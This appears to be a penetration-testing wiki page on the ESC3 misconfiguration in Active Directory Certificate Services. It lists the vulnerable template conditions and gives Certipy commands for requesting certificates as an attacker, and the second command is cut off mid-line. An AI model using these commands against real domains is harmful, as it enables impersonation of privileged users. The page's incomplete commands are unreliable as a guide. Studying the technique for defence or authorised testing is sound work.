# ESC3

> **TL;DR**
>
> ESC3 allows you to request a certificate that can be used to request another certificate on behalf of any user and use that certificate for client authentication using Kerberos.

A template is vulnerable to ESC3 when a certificate template defines the Certificate Request Agent EKU that allows for requesting other certificate templates on behalf of other principals.

A certificate template with the following configuration is vulnerable to ESC3:

* The Enterprise CA allows low-privileged users enrollment rights.
* Manager approval is disabled.
* No authorized signatures are required.
* An overly permissive certificate template security descriptor allows certificate enrollment rights to low-privileged users.
* The certificate template defines the Certificate Request Agent EKU.

## Exploit

{% tabs %}
{% tab title="Certipy.py" %}
{% embed url="<https://github.com/ly4k/Certipy#esc1>" %}

{% code title="Linux (Attacker)" %}

```fish
# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]

# Request a certificate using the .pfx output from above command with -on-behalf-of an elevated account
certipy req -u
```

{% endcode %}

{% endtab %}

{% tab title="Certify.exe" %}

{% endtab %}
{% endtabs %}